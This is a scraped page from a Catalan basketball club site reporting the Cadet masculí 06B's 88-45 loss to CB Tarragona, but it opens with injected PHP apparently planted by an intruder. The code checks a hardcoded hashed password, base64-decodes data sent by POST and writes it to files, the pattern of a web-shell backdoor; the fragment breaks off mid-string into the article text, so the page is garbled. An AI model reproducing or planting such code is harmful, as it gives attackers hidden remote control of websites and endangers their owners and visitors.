function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet masculí 06B, superat en el 1c1, és derrotat pel CB Tarragona (88-45) - Tgn Bàsquet Club -

El Cadet masculí 06B, superat en el 1c1, és derrotat pel CB Tarragona (88-45)

Updated: juny 3, 2021

El Cadet masculí 06B paga cares les errades defensives i no pot amb el CB Tarragona. Partit molt físic per part dels jugadors blaus, que aprofiten la seva superioritat en l’ofensiva individual i els contraatacs per obrir la bretxa al marcador en els primers 10 minuts amb un parcial de 25-9. La resta del matx va tenir la mateixa dinàmica, i els visitants es van veure superats pels locals, que van jugar a una intensitat continua els 40 minuts, oferint poques opcions als liles. D’altra banda, l’equip que entrena Icart va poder recuperar alguns jugadors que van ser baixes en partits anteriors i, tot i el desencert de cara a l’anella, van mostrar moments de joc en estàtic molt treballats, amb bona circulació de pilota.